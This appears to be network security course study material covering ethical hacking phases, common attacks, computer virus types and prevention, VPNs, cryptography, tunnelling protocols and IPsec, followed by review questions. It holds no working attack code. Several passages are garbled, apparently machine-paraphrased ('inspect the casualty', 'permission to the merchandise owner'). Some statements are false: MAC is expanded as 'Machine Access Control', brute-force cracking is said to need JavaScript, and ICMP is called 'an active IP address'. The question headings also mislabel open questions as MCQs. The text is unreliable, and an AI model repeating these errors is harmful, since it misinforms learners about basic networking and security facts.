Page |1

Study Material
(Security Specialist_BNCSD502B)
_______________________________________________________________________________________

Table of Contents

SERIAL TOPIC SUB TOPIC MODULE PAGE

1. The security threats facing modern network 1 2-10
infrastructure.
MCQ 1 11-12
SAQ 1 12-13

2. Fundamentals of vpn technology and 2 13-28

cryptography.
MCQ 2 29
SAQ 2 30

3. AAA Authentication 5 31-38

MCQ 5 39
SAQ 5 40

4. Network Address Translation 4 41-43

MCQ 4 44
SAQ 4 45

5. Access control List 3 46-52

MCQ 3 53
SAQ 3 53
Page |2

MODULE - I
THE SECURITY THREATS FACING MODERN NETWORK INFRASTRUCTURE
Ethical Hacking
 Ethical Hacking is when the individual is allowed to hacks the systems with the

 permission to the merchandise owner to search out of weakness in an exceedingly
system and the later fix them.
 To find flaws and vulnerabilities
 To determine the risk to the organization

Ip Address and Mac address

 IP address: To every device to an IP address is assigned, so that device can be
located to the network.
 MAC (Machine Access Control) address: A MAC address is the unique serial number
assigned to every network interface on every device.

Common tools used by Ethical hackers

 MetaSploit
 WireShark
 NMAP
 John The Ripper
 Maltego

Types of the Ethical Hackers

 Grey Box hackers
 Black Box Penetration Testers
 White Box Penetration Testers

Footprinting in Ethical Hacking and techniques use

 Footprinting refers to accumulating and uncovering as much as information about the
target network before gaining to access into any network. Then approach adopted by
hackers before hacking
 Open Source Footprinting : It will be look for the contact information of administrators
that will be used in the guessing password in Social engineering
 Network Enumeration : The hacker tries to identify the domain names and network
blocks of target network
 Scanning : Once the network is known, the second step is to spy of active IP
addresses on for identifying the active IP addresses (ICMP) Internet Control Message
Protocol is an active IP address.
 Stack Fingerprinting : Once of hosts and port have been mapped by the scanning to
network, the final footprinting step can be performed. This is called Stack
fingerprinting.
Page |3

Brute Force Hac

 Brute force hack is a technique for the hacking password and get access to the system
and network resources, it takes much time, it needs to a hacker to learn about the
JavaScripts. For this purpose, one can use of tool name is “Hydra”.

DOS (Denial of service) attack

 Denial of Service, is a malicious attack on network that is done by flooding the network
with useless to traffic. Although, DOS does not cause any theft of the information or
security breach, it can cost the website owner is great deal of moneyand time.

Common forms of the DOS attack

 Buffer Overflow Attacks
 SYN Attacks
 Teardrop Attacks
 Smurf Attacks
 Viruses

SQL injection
SQL is one of the techniques used to steal data from the organizations, it is a fault to
create in the application code. SQL injection happens to when you inject the content into
an SQL query string and the result mode of content into a SQL query string, and the result
modifies the syntax of your query in the ways you did not intend

Types of computer based on social engineering attacks

 Phishing
 Baiting
 Online scams

Phishing
 Phishing technique involves sending of false emails, chats or website to the
impersonate real system with aim of stealing information from the original website.

Network Sniffing
A network sniffer to monitors data flowing over the computer network links. By allowing
you to capture and view the packet to level data on your network, sniffer tool can help you
to the locate network problems. Sniffers can be used for both stealing information off the
network and also for legitimate network management.
Page |4

Cross-site scripting and types

 Cross site scripting is done by the using of known vulnerabilities like web based on
applications, their servers or plug-ins users rely upon. Exploiting one of these by
inserting malicious coding into the link which appears to be an trustworthy source.
When users click on this link of malicious code will run as a part of the client’s web
request and execute on the user’s computer, allowing the attacker to steal information.
 There are three types of Cross-site scripting:
 Non-persistent
 Persistent
 Server side versus DOM based vulnerabilities

Burp Suite
 Burp suite is an integrated platform used for the attacking web applications. It consists
of all the Burp tools and required for attacking an applications. Burp Suite tool has to
same approach for the attacking web applications like framework for handling HTTP
requests, upstream proxies, alerting, logging and so on.

Types of password cracking techniques

 Attack Brute Forcing
 Attacks Hybrids
 Attack Syllables
 Attack Rules

Hacking stages
 Hacking, or targeting on an machine, should have the following 5 phases :
 Surveillance : This is the principal stage where the hacker is endeavours to gather as
much data is possible about the target.
 Scanning : This stage of includes exploiting the data accumulated amid Surveillance
stage and utilizing it to the inspect the casualty. The hacker can a utilize computerized
devices amid the scanning stage which can be incorporate port scanners, mappers
and vulnerability scanners.
 Getting access : This is where the real hacking as happens. The hacker attempts to
the exploit data found amid the surveillance and the Scanning stage to get access.
 Access Maintenance : Once access is gained, hackers need to a keep that access for
future the exploitation and assaults by securing their exclusive access with a
backdoors, rootkits and Trojans.
 Covering tracks : Once hackers have a possessed the capacity to pick up and
maintain to access, they cover their tracks and to keep away from getting is detected.
This likewise enables them to be proceed with the utilization of the hacked framework
and keep themselves away from legitimate activities.

Types of password attack

Page |5

 Guessing. Simple, repeated attempts using a common password or known facts

about the users.
 Stealing. Physically or electronically acquiring a user’s passwords– can be include
sniffing of the network communications.
 Dictionary Attacks.
 Brute Forces Attacks.
 Rainbows Tables.
 Hybrid Password Attacks.
 Birthday Attacks.
Hacking Vs. Ethical Hacking
 Hacking: it defines the illegal way of accessing the system (Unauthorized Access)
 Ethical hacking: Legal way of accessing the system (Penetration testing)

Enumeration
 Extracting information from the system\files
Cisco Self Defending Network Architecture:
 A new generation of interactive business communication and collaboration
technologies provides tremendous productivity and flexibility gains for organizationsof
all kinds. But this unprecedented connectivity also unleashes new, complex security
risks, including:
 Increased exposure to security threats—Ubiquitous access to Web-enabled
applications and services enables users to work from anywhere, anytime—but also
places businesses at risk anywhere, anytime.
 An eroding network perimeter—The traditional network barriers that separatedtrusted
from untrusted and “inside” from “outside” are now disappearing. As more applications
become directly accessible to remote users and systems, the concept of the network
perimeter becomes increasingly vague and more difficult to protect.
 Evolving threats—Information attacks of the past were largely an issue of cyber-
vandalism, with hackers primarily looking for fame. Today’s attacks are a profit- driven
business, often controlled by organized crime. The modern attacker uses a patient,
“stealth” approach to eventually achieve a successful attack. In addition, modern
attackers often avoid technology defences, using spam, phishing attacks, and
fraudulent Web links to target an organization’s weakest link: human beings. As
security risks have evolved, so have organizations’ approaches to them. Where
information security was once a technology issue, today it is a business issue—
representing a more significant cost and operational challenge, but a fundamental
business enabler as well. More and more organizations are implementing formal
programs to reduce IT risk, especially security and compliance risks. As regulatory
compliance becomes a core requirement for organizations in more industries,
businesses must develop new capabilities for controlling the kinds of information
traversing their network, how that information is used, and who can access it.
Organizations not only face the challenge of becoming compliant, but of staying
compliant as the network continuously evolves with business needs.

 Organizations are wrestling with information security demands that span many
overarching business challenges such as complying with regulatory requirements,
Page |6

preventing data loss, and blocking malware. The problem is that dealing with these
types of challenges requires a true security solution—not just security products. To
prevent data loss alone, for example, businesses need a combination of strong
perimeter defences, malware defences, identity services, endpoint security, policy
enforcement mechanisms, and security monitoring tools, as well as a strong plan for
making them all work in concert. No single security product can provide all of these
capabilities. So, today’s businesses need security solutions that combine multiple
best-of-breed products and approaches into a single, autonomous defence system.
They need a truly holistic security solutions approach to network defence.

Definition of Computer Virus:

 A computer virus is a type of malicious software, or malware, that spreads between
computers and causes damage to data and software.
 Computer viruses aim to disrupt systems, cause major operational issues, and result
in data loss and leakage. A key thing to know about computer viruses is that they are
designed to spread across programs and systems. Computer viruses typically attach
to an executable host file, which results in their viral codes executing when a file is
opened. The code then spreads from the document or software it is attached to via
networks, drives, file-sharing programs, or infected email attachments.

 Common Signs of Computer Viruses

 A computer virus will more than likely have an adverse effect on the device it resideson
and may be discoverable through common signs of performance loss, including:
 Speed of System
 A computer system running slower than usual is one of the most common signs that
the device has a virus. This includes the system itself running slowly, as well as
applications and internet speed suffering. If a computer does not have powerful
applications or programs installed and is running slowly, then it may be a sign it is
infected with a virus.
 Pop-up Windows
 Unwanted pop-up windows appearing on a computer or in a web browser are a telltale
sign of a computer virus. Unwanted pop-ups are a sign of malware, viruses,or spyware
affecting a device.
 Programs Self-executing
 If computer programs unexpectedly close by themselves, then it is highly likely thatthe
software has been infected with some form of virus or malware. Another indicator of
a virus is when applications fail to load when selected from the Start menu or their

desktop icon.

 Accounts Being Logged Out

Page |7

 Some viruses are designed to affect specific applications, which will either cause them
to crash or force the user to automatically log out of the service.
 Crashing of the Device
 System crashes and the computer itself unexpectedly closing down are common
indicators of a virus. Computer viruses cause computers to act in a variety of strange
ways, which may include opening files by themselves, displaying unusual error
messages, or clicking keys at random.
 Mass Emails Being Sent from Your Email Account
 Computer viruses are commonly spread via email. Hackers can use other people's
email accounts to spread malware and carry out wider cyberattacks. Therefore, if an
email account has sent emails in the outbox that a user did not send, then this could
be a sign of a computer virus.
 Changes to Your Homepage
Any unexpected changes to a computer—such as your system’s homepage being
amended or any browser settings being updated—are signs that a computer virus may be
present on the device.

How Do Computer Viruses Attack and Spread?

 In the early days of computers, viruses were spread between devices using floppy
disks. Nowadays, viruses can still be spread via hard disks and Universal Serial Bus
(USB) devices, but they are more likely to be passed between devices through the
internet.
Computer viruses can be spread via email, with some even capable of hijacking email
software to spread themselves. Others may attach to legitimate software, within software
packs, or infect code, and other viruses can be downloaded from compromised
application stores and infected code repositories. A key feature of any computer virus is it
requires a victim to execute its code or payload, which means the host application should
be running.

Types of Computer Viruses:

 There are several types of computer viruses that can infect devices. This section
will cover computer virus protections and how to get rid of computer viruses.
 Resident Virus
 Viruses propagate themselves by infecting applications on a host computer. A
resident virus achieves this by infecting applications as they are opened by a user.A
non-resident virus is capable of infecting executable files when programs are not
running.
 Multipartite Virus
 A multipartite virus uses multiple methods to infect and spread across computers. It
will typically remain in the computer’s memory to infect the hard disk, then spread
through and infect more drives by altering the content of applications. This results in
performance lag and application memory running low.
Page |8

 Multipartite viruses can be avoided by not opening attachments from untrusted

sources and by installing trusted antivirus software. It can also be prevented by
cleaning the boot sector and the computer’s entire disk.
 Direct Action
 A direct action virus accesses a computer’s main memory and infects all programs,
files, and folders located in the autoexec.bat path, before deleting itself. This virus
typically alters the performance of a system but is capable of destroying all data onthe
computer’s hard disk and any USB device attached to it. Direct action viruses can be
avoided through the use of antivirus scanners. They are easy to detect, as is restoring
infected files.
 Browser Hijacker
 A browser hijacker manually changes the settings of web browsers, such as replacing
the homepage, editing the new tab page, and changing the default search engine.
Technically, it is not a virus because it cannot infect files but can be hugelydamaging
to computer users, who often will not be able to restore their homepage or search
engine. It can also contain adware that causes unwanted pop-ups and
advertisements.
 Browser hijackers typically attach to free software and malicious applications from
unverified websites or app stores, so only use trusted software and reliable antivirus
software.
 Overwrite Virus
 Overwrite viruses are extremely dangerous. They can delete data and replace it with
their own file content or code. Once files get infected, they cannot be replaced,and the
virus can affect Windows, DOS, Linux, and Apple systems. The only way this virus
can be removed is by deleting all of the files it has infected, which could be
devastating. The best way to protect against the overwrite virus is to use a trusted
antivirus solution and keep it updated.

 Web Scripting Virus

 A web scripting virus attacks web browser security, enabling a hacker to inject web-
pages with malicious code, or client-side scripting. This allows cyber criminals to
attack major websites, such as social networking sites, email providers, and any site
that enables user input or reviews. Attackers can use the virus to send spam, commit
fraudulent activity, and damage server files.

 Protecting against web scripting is reliant on deploying real-time web browser

protection software, using cookie security, disabling scripts, and using malicious
software removal tools.
 File Infector
 A file infector is one of the most common computer viruses. It overwrites files when
Page |9

they are opened and can quickly spread across systems and networks. It largely
affects files with .exe or .com extensions. The best way to avoid file infector virusesis
to only download official software and deploy an antivirus solution.
 Network Virus
 Network viruses are extremely dangerous because they can completely cripple entire
computer networks. They are often difficult to discover, as the virus could behidden
within any computer on an infected network. These viruses can easily replicate and
spread by using the internet to transfer to devices connected to the network. Trusted,
robust antivirus solutions and advanced firewalls are crucial to protecting against
network viruses.
 Boot Sector Virus
 A boot sector virus targets a computer’s master boot record (MBR). The virus injectsits
code into a hard disk’s partition table, then moves into the main memory when a
computer restarts. The presence of the virus is signified by boot-up problems, poor
system performance, and the hard disk becoming unable to locate. Most modern
computers come with boot sector safeguards that restrict the potential of this type of
virus.
 Steps to protecting against a boot sector virus include ensuring disks are write-
protected and not starting up a computer with untrusted external drives connected.

More About Computer Viruses Through Examples:

There are common examples of what computer and internet users believe to beviruses, but are
technically incorrect.
 Is Trojan a Virus?
o A Trojan horse is a type of program that pretends to be something it is not to get onto
a device and infect it with malware. Therefore, a Trojan horse virus is a virus disguised
to look like something it is not. For example, viruses can be hidden within unofficial
games, applications, file-sharing sites, and bootlegged movies.
 Is a Worm a Virus?
o A computer worm is not a virus. Worms do not need a host system and can spread
between systems and networks without user action, whereas a virus requires usersto
execute its code.

 Is Ransomware a Virus?
o Ransomware is when attackers lock victims out of their system or files and demanda
ransom to unlock access. Viruses can be used to carry out ransomware attacks.
 Is Rootkit a Virus?
o A rootkit is not a virus. Rootkits are software packages that give attackers access to
systems. They cannot self-replicate or spread across systems.
P a g e | 10

 Is a Software Bug a Virus?

o "Bug" is a common word used to describe problems with computers, but a softwarebug
is not a virus. A bug is a flaw or mistake in software code, which hackers can exploit
to launch a cyberattack or spread malware.

How to Prevent Your Computer from Viruses:

 There are several ways to protect your computer from viruses, including:
 Use a Trusted Antivirus Product
o Trusted computer antivirus products are crucial to stop malware attacks and
prevent computers from being infected with viruses. These antivirus concepts will
protect devices from being infected through regular scans and identifying and blocking
malware.
 Avoid Clicking Pop-up Advertisements
o Unwanted pop-up advertisements are more than likely to be linked to computer
viruses and malware. Never click on pop-up advertisements because this can leadto
inadvertently downloading viruses onto a computer.
 Scan Your Email Attachments
o A popular way to protect your device from computer viruses is to avoid suspicious
email attachments, which are commonly used to spread malware. Computerantivirus
solutions can be used to scan email attachments for potential viruses.
 Scan the Files That You Download Using File-sharing Programs
o File-sharing programs, particularly unofficial sites, are also popular resources for
attackers to spread computer viruses. Avoid downloading applications, games, or
software from unofficial sites, and always scan files that have been downloaded from
any file-sharing program.
P a g e | 11

 Chapter Related Questions ( MCQ)

1. List some common security threats facing modern networks.
2. Explain what a distributed denial of service (DDoS) attack is.
3. Describe how hackers exploit vulnerabilities to launch attacks on networks.
4. Analyze the purpose of a firewall in network security.
5. Evaluate the risks associated with unsecured wireless networks.
6. Design a man-in-the-middle (MitM) attack.
7. Explain how network traffic analysis helps detect and prevent security threats.
8. Design a network segmentation strategy.
9. Evaluate: Evaluate the potential consequence of a data breach on network security and privacy.
10. Explain the role of social engineering in network security breaches.
11. Develop a set of best practices for securing network devices, such as routers and switches.
12. Define what a zero-day vulnerability is.
13. Explain the purpose of configuring access control lists (ACLs) on a network device.
14. Compare and contrast a firewall and an intrusion detection system (IDS).
15. Design a strong access control and user authentication mechanism.
16. Explain the significance of regular security audits and penetration testing in network
environments.
17. Develop a disaster recovery plan for a network environment.
18. Evaluate the potential security risks associated with misconfigured or overly permissive access
control lists (ACLs).
19. Explain the role of encryption in securing network communications and data privacy.
20. Evaluate the potential security risks associated with using default credentials on network
devices.
21. Compare and contrast source NAT and destination NAT.
22. Design a network monitoring and logging strategy.
23. Evaluate the potential security risks associated with misconfigured or weak wireless network
encryption.
24. Explain the purpose of network traffic analysis in network security.
25. Evaluate the potential consequences of a network security breach on an organization.
26. Explain the significance of network segmentation in network security.
27. Design an intrusion detection and prevention system (IDPS) strategy.
28. Evaluate the potential impact of a compromised authentication server on network security.
P a g e | 12

 Chapter Related Questions ( SAQ)

1. What is an Access Control List (ACL)?
2. Differentiate between standard and extended ACLs.
3. How does an ACL determine which packets are allowed or denied access to a network?
4. Write an ACL statement that permits all traffic from source IP address 192.168.1.0/24 to
destination IP address 10.0.0.0/24.
5. Explain the order in which ACL statements are processed and how that affects packet
filtering.
6. Evaluate the advantages and disadvantages of using ACLs for network security.
7. Design an ACL that allows HTTP traffic from any source IP address but denies FTP
traffic from IP address 192.168.1.5.
8. What are the different types of ACLs available on Cisco devices?
9. What is the purpose of an ACL wildcard mask?
Understand: How does an implicit "deny all" statement affect the behavior of an ACL?
10. Configure an ACL to permit Telnet traffic from a specific source IP address while denying
all other Telnet traffic.
11: Discuss the potential impact of an incorrect ACL configuration on network traffic flow.
12. Assess the significance of proper ACL placement within a network topology.
13. Create an extended ACL that allows ICMP traffic from any source IP address to a
specific destination IP address.
14. What are the two primary categories of ACLs based on the direction of packet filtering?
15. What is the purpose of a numbered ACL?
16. How does a named ACL differ from a numbered ACL in terms of configuration and
usage?
17. Configure a standard ACL that permits SSH traffic from a specific source network while
denying all other SSH traffic.
18. Explain the potential consequences of overlapping ACL statements and how to resolve
them.
19. Assess the impact of a misconfigured ACL on network performance and security?

20. Design an ACL that allows HTTP traffic from a specific source IP address range and
denies HTTPS traffic from any source IP address.

21. What is the order of evaluation for ACL entries?

22. What is an ACL hit count, and how can it be used for troubleshooting?
23. How does an extended ACL differ from a standard ACL in terms of filtering criteria?
24. Configure an ACL to permit DNS traffic from any source IP address but deny ICMP traffic
from a specific source IP address.

25. Discuss the role of wildcard masks in defining ACL filtering criteria.
26. Evaluate the potential security risks associated with misconfigured or overly permissive
ACLs.

27. Create an extended ACL that allows SMTP traffic from any source IP address to a
specific destination IP address.

28. What are the default behaviors of an ACL when no explicit permit or deny statements
are configured?
29. What is the purpose of applying ACLs on router interfaces?
P a g e | 13

MODULE - II
FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY
A virtual private network (VPN) is used to transport data from a private network to another
private network over a public network, such as the Internet, using encryption to keep the
data confidential. In other words, a VPN is an encrypted connection between private
networks over a public network, most often the Internet. VPNs provide the following
services:

 Confidentiality: VPNs prevent anyone in the middle of the Internet from being able to read the
data. The Internet is inherently insecure as data typically crosses networks and
devices under different administrative controls. Even if someone is able to
intercept data at some point in the network, they will not be able to interpret it
due to encryption.

 Integrity: VPNs ensure that data was not modified in any way as it traversed the Internet.

 Authentication: VPNs use authentication to verify that the device at the other end of VPN is a
legitimate device and not an attacker impersonating a legitimate device.

 Anti-Replay: VPNs ensure that hackers are not able to make changes to packets that flow
from source to destination.

A VPN is essentially a secure channel, often called a tunnel, between two devices or end
points near the edge of the Internet. The VPN end points encrypt the whole of original IP
packet, meaning someone who even manages to see a copy of the packet as it traverses
the network cannot understand the contents of the original packet. The VPN end points
also append headers to the original encrypted packet. The additional headers include
fields that allow VPN devices to perform all their functions.

VPNs have several advantages over other WAN technologies, some of which are
summarized here:

 Cost: Internet VPN solutions can be much cheaper than alternate private WAN options
available today.

 Security: Modern VPN solutions can be as secure as private WAN options and are being
P a g e | 14

used even by organizations with the most stringent security requirements such as credit card
companies.

 Scalability: Internet VPN solutions can be scaled quickly and cost-effectively to a large
number of sites. Each location can choose from multiple options of Internet connectivity.

FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY

(II)
Remote Access VPN
A remote-access VPN allows individual users to establish secure connections with a
remote computer network. Those users can access the secure resources on that network
as if they were directly plugged in to the network's servers. An example of a company that
needs a remote-access VPN is a large firm with hundreds of salespeople in the field.
Another name for this type of VPN is virtual private dial-up network (VPDN),
acknowledging that in its earliest form, a remote-access VPN required dialing in to a server
using an analog telephone system.

There are two components required in a remote-access VPN. The first is a network
access server (NAS), also called a media gateway or a remote-access server (RAS).
A NAS might be a dedicated server, or it might be one of multiple software applications
running on a shared server. It is a NAS that a user connects to from the Internet in order to
use a VPN. The NAS requires that user to provide valid credentials to sign in to the VPN.
To authenticate the user's credentials, the NAS uses either its own authentication process
or a separate authentication server running on the network.

Site-to-site VPN
A ‘Site-to-Site VPN’ is also called a ‘Router-to-Router VPN’ and is the mostly used in
corporate based operations. The fact that many companies have offices located both
nationally and internationally, a Site- to-Site VPN is used to connect the network of the
main office location to multiple offices. This is also known as an Intranet based VPN. The
opposite is also possible with Site-to-Site VPN. Companies use Site- to-Site VPN to
connect with other companies in the same way and this classified as an Extranet based
VPN. In simple terms, Site-to-Site VPNs build a virtual bridge that joins networks at
various locations in order to connect them to the internet and maintain a secure and
private communication between these networks.
P a g e | 15

The steps in the above graphic are explained here:

1. A PC in the branch office sends a packet to a server in the headquarters, just as it would
without a VPN.
2. Cisco Adaptive Security Appliance (ASA) at the branch office, that is ASA1, encrypts
the original packet, adds a VPN header, and adds a new IP header with public IP
addresses.
3. ASA2 at the headquarters receives the packet, authenticates the identity of the sender,
confirms that the packet has not been changed in transit, and then decrypts the original
packet.
4. The server receives the decrypted packet.

Above figure shows Cisco Adaptive Security Appliance (ASA) performing VPN functions.
However, several other hardware and software products are available for building VPNs.
Some VPN products offered by Cisco are mentioned here.

 Cisco Router: All Cisco routers that run Cisco IOS software can support IPsec VPNs. The
only requirement is that you should use a Cisco IOS image with appropriate feature set.
Examples of VPN- enabled routers include the Cisco 1800, Cisco 2800, Cisco 1900, and Cisco
2900 series.

 Cisco Adaptive Security Appliance (ASA): The Cisco ASA is a versatile appliance that
combines several security functions including firewall and VPN capabilities in a single piece of
hardware. All ASA models support IPsec VPN provided you meet the licensing requirements
to enable the VPN feature.

 Cisco VPN Clients: Cisco offers both hardware and software VPN clients. Cisco AnyConnect
Secure Mobility Client is a software VPN client that runs on laptops as well as smartphones
and tablets.

FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY

(III)
The art and science of concealing the messages to introduce secrecy in information security is
recognized as cryptography. The word ‘cryptography’ was coined by combining two Greek words,
‘Krypto’ meaning hidden and ‘graphene’ meaning writing.
P a g e | 16

Security Services of Cryptography

The primary objective of using cryptography is to provide the following four fundamental
information security services –

Confidentiality: Confidentiality is the fundamental security service provided by

cryptography. It is a security service that keeps the information from an unauthorized
person. It is sometimes referred to as privacy or secrecy. Confidentiality can be achieved
through numerous means starting from physical securing to the use of mathematical
algorithms for data encryption.

Data Integrity: It is security service that deals with identifying any alteration to the data.
The data may be modified by an unauthorized entity intentionally or accidently. Integrity
service confirms that whether data is intact or not since it was last created, transmitted,
or stored by an authorized user. Data integrity cannot prevent the alteration of data, but
provides a means for detecting whether data has been manipulated in an unauthorized
manner.

Authentication: Authentication provides the identification of the originator. It confirms to

the receiver that only an identified and verified sender has sent the data received.
Authentication service has two variants −

 Message authentication identifies the originator of the message without any regard router or
system that has sent the message.
 Entity authentication is assurance that data has been received from a specific entity, say a
particular website.

Non-repudiation: It is a security service that ensures that an entity cannot refuse the
ownership of a previous commitment or an action. It is an assurance that the original
creator of the data cannot deny the creation or transmission of the said data to a recipient
or third party. Non-repudiation is a property that is most desirable in situations where there
are chances of a dispute over the exchange of data.

Cryptosystem

A ‘cryptosystem’ is an implementation of cryptographic techniques and their

accompanying infrastructure to provide information security services. A cryptosystem is
also referred to as a cipher system.
P a g e | 17

Components of a Cryptosystem

The various components of a basic cryptosystem are as follows −

 Plaintext: It is the data to be protected during transmission.

 Encryption Algorithm: It is a mathematical process that produces a cipher text for any
given plaintext and encryption key. A cryptographic algorithm takes plaintext and an
encryption key as input and produces a cipher text.
 Cipher text: It is the scrambled version of the plaintext produced by the encryption algorithm
using a specific the encryption key. The cipher text is not guarded. It flows on public channel.
It can be intercepted or compromised by anyone who has access to the communication
channel.
 Decryption Algorithm: It is a mathematical process, that produces a unique plaintext for
any given cipher text and decryption key. A cryptographic algorithm takes a cipher text and
a decryption key as input, and outputs a plaintext. The decryption algorithm essentially
reverses the encryption algorithm and is thus closely related to it.
 Encryption Key: the sender knows a value. The sender inputs the encryption key into the
encryption algorithm along with the plaintext in order to compute the cipher text.
 Decryption Key: The receiver knows a value. The decryption key is related to the
encryption key, but is not always identical to it. The receiver inputs the decryption key into the
decryption algorithm along with the cipher text in order to compute the plaintext.

FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY

(IV)
Different Tunneling Protocols

Serial In-line Protocol (SLIP): Serial Line IP was created first to allow isolated hosts to
link via TCP/IP over the telephone network. The SLIP protocol defines a simple
mechanism for framing datagrams for transmission across serial lines. SLIP sends the
datagram across the serial line as a series of bytes, and it uses special characters to mark
when a series of bytes should be grouped together as a datagram. SLIP defines two
special characters for this purpose:

 The SLIP END character is the character that marks the end of a datagram. When the receiving
SLIP encounters the END character, it knows that it has a complete datagram that can be sent
up to IP.

 The SLIP ESC character is used to "escape" the SLIP control characters. If the sending SLIP
encounters a byte value equivalent to either a SLIP END character or a SLIP ESC character in
the datagram it is sending, it converts that character to a sequence of two characters. This
procedure prevents the receiving SLIP from incorrectly interpreting a data byte as the end of the
datagram.
P a g e | 18

The deficiencies in SLIP fall into two categories:

 The SLIP protocol does not define any link control information that could be used to
dynamically control the characteristics of a connection. Therefore, SLIP systems must assume
certain link characteristics. Because of this limitation, SLIP can only be used when both hosts
know each other's address, and only when IP datagrams are being transmitted.
 SLIP does not compensate for noisy, low-speed telephone lines. The protocol does not
provide error correction or data compression.

Point-to-Point Protocol (PPP): PPP was devised by IETF (Internet Engineering Task
Force) to create a data link protocol for point-to-point lines that can solve all the problems
present in SLIP. PPP is most commonly used data link protocol. It is used to connect
the Home PC to the server of ISP via a modem. This protocol offers several facilities that
were not present in SLIP. Some of these facilities are:

1. PPP defines the format of the frame to be exchanged between the devices.

2. It defines link control protocol (LCP) for -

(a) Establishing the link between two devices.

(b) Maintaining this established link.

(c) Configuring this link.

(d) Terminating this link after the transfer.

3. It defines how network layer data are encapsulated in data link frame.

4. PPP provides error detection.

5. Unlike SLIP that supports only IP, PPP supports multiple protocols.

6. PPP allows the IP address to be assigned at the connection time i.e. dynamically.
Thus, a temporary IP address can be assigned to each host.

7. It defines how network layer data are encapsulated in data link frame.

 PPP provides error detection.

 Unlike SLIP that supports only IP, PPP supports multiple protocols.

 PPP allows the IP address to be assigned at the connection time i.e. dynamically. Thus,
a temporary IP address can be assigned to each host.
P a g e | 19

 PPP provides multiple network layer services supporting a variety of network layer protocol.
For this PPP uses a protocol called NCP (Network Control Protocol).

 It also defines how two devices can authenticate each other.

PPP uses several other protocols to establish link, authenticate users and to carry the
network layer data. The various protocols used are:

1. Link Control Protocol (LCP) - It is responsible for establishing, maintaining, configuring and
terminating the link. It also provides negotiation mechanism to set options between two
endpoints.

2.Authentication Protocol (AP) - Authentication protocols help to validate the identity of a user
who needs to access the resources. There are two authentication protocols:

 Password Authentication Protocols (PAP)

 Challenge Handshake Authentication Protocol (CHAP)

3. Network Control Protocol (NCP) - After establishing the link and authenticating the user, PPP
connects to the network layer. This connection is established by NCP. Therefore, NCP is a set of
control protocols that allow the encapsulation of the data coming from network layer. After one of
the NCP protocols does the network layer configuration, the users can exchange data from the
network layer. PPP can carry a network layer data packet from protocols defined by the Internet,
DECNET, Apple Talk, Novell, OSI, Xerox and so on. None of the NCP packets carries networks
layer data. They just configure the link at the network layer for the incoming data.

Point-to-Point Protocol over Ethernet (PPPoE): PPPoE is a network configuration

used for establishing a PPP connection over an Ethernet protocol. It is commonly used
for creating DSL Internet connections. Since DSL modems typically connect to computers
via an Ethernet connection, a standard dial-up PPP connection cannot be used.
Therefore, PPP over Ethernet allows computers to connect to an Internet service provider
(ISP) via a DSL modem. In order to create a
P a g e | 20

PPPoE connection, you will need to enter the service name provided by the ISP as well
as a username and password. This provides a simple way for the ISP to uniquely identify
your system and establish your Internet connection. PPPoE can be contrasted to DHCP,
which dynamically assigns unique IP addresses to connected systems and is typically
used by cable Internet service providers.

The biggest advantage of a PPPoE configuration is that it is easy to set up. It also
supports multiple computers on a local area network (LAN). The downside of PPPoE is
that it requires additional overhead, or extra data, to be sent over the Internet connection.

Point-to-Point Tunneling Protocol (PPTP): PPTP (Point-to-Point Tunneling Protocol)

is a network protocol used in the implementation of Virtual Private Networks (VPN). PPTP
uses a client-server design that operates at Layer 2 of the OSI model. PPTP VPN clients
are included by default in Microsoft Windows and available for both Linux and Mac OS X.
PPTP is most commonly used for VPN remote access over the Internet. In this usage,
VPN tunnels are created via the following two-step process:

 The user launches a PPTP client that connects to their Internet provider.
 PPTP creates a TCP control connection between the VPN client and VPN server. The protocol
uses TCP port 1723 for these connections and General Routing Encapsulation (GRE) to finally
establish the tunnel.

As a tunneling protocol, PPTP encapsulates network protocol datagrams within an IP

envelope. After the packet is encapsulated, any router or machine that encounters it from
that point on will treat it as an IP packet. The benefit of IP encapsulation is that it allows
many different protocols to be routed across an IP-only medium, such as the Internet.

PPTP also supports VPN connectivity across a local network. Once the VPN tunnel is
established, PPTP supports two types of information flow:

 Control messages for managing and eventually tearing down the VPN connection.
Control messages pass directly between VPN client and server.
P a g e | 21

 Data packets that pass through the tunnel, to or from the VPN client.
P a g e | 22

PPTP offers the following advantages:

 Lower transmission costs: No additional service used, other than the Internet.
 Lower hardware costs: Allows ISDN cards and modems to be separated from RAS
servers, which results in fewer devices to purchase and manage.
 Low administrative overhead: Administrators only manage the remote access server
(RAS) and user accounts, rather than managing different hardware configurations.
 Enhanced security: PPTP connection is encrypted and secured over the Internet and
works with other networking protocols, like IP, Internetwork Packet Exchange (IPX) and
NetBIOS Extended User Interface (NetBEUI).

Layer-2 Tunneling Protocol (L2TP): This protocol is designed by IETF. L2TP utilizes two types of
messages - control messages and data messages. Control messages are used in the establishment,
maintenance and clearing of tunnels and calls. Data messages are used to encapsulate PPP frames being
carried over the tunnel. Control messages utilize a reliable Control Channel within L2TP to guarantee
delivery. Data messages are not retransmitted when packet loss occurs.

PPP Frames are passed over an unreliable Data Channel encapsulated first by an L2TP header and
then a Packet Transport such as UDP, Frame Relay, ATM, etc. Control messages are sent over a
reliable L2TP Control Channel, which transmits packets in-band over the same Packet Transport.

FUNDAMENTALS OF VPN TECHNOLOGY AND CRYPTOGRAPHY

(V)

IP Security Protocol

Internet Protocol security (IPSec) is a framework of open standards for protecting

communications over Internet Protocol (IP) networks with cryptographic security services.
IPSec supports network-level peer authentication, data origin authentication, data
integrity, and data confidentiality (encryption), and replay protection.
P a g e | 23

IPSec provides the capability to secure communications across a LAN, across private
andpublic wide area networks (WAN’s), and across the Internet.
• Secure branch office connectivity over the Internet: A company can build a secure virtual
private network over the Internet or over a public WAN. This enables a business to rely heavily
on the Internet and reduce its need for private networks, saving costs and network management
overhead.
• Secure remote access over the Internet: An end user whose system is equipped with IP
security protocols can make a local call to an Internet service provider (ISP) and gain secure
access to a company network. This reduces the cost of toll charges for travelling employees and
telecommuters.
• Establishing extranet and intranet connectivity with partners: IPSec can be used to secure
communication with other organizations, ensuring authentication and confidentiality and
providing a key exchange mechanism.
• Enhancing electronic commerce security: Even though some Web and electronic commerce
applications have built-in security protocols, the use of IPSec enhances that security.

The following figure shows a typical scenario of IPSec usage. An organization maintains LANs at
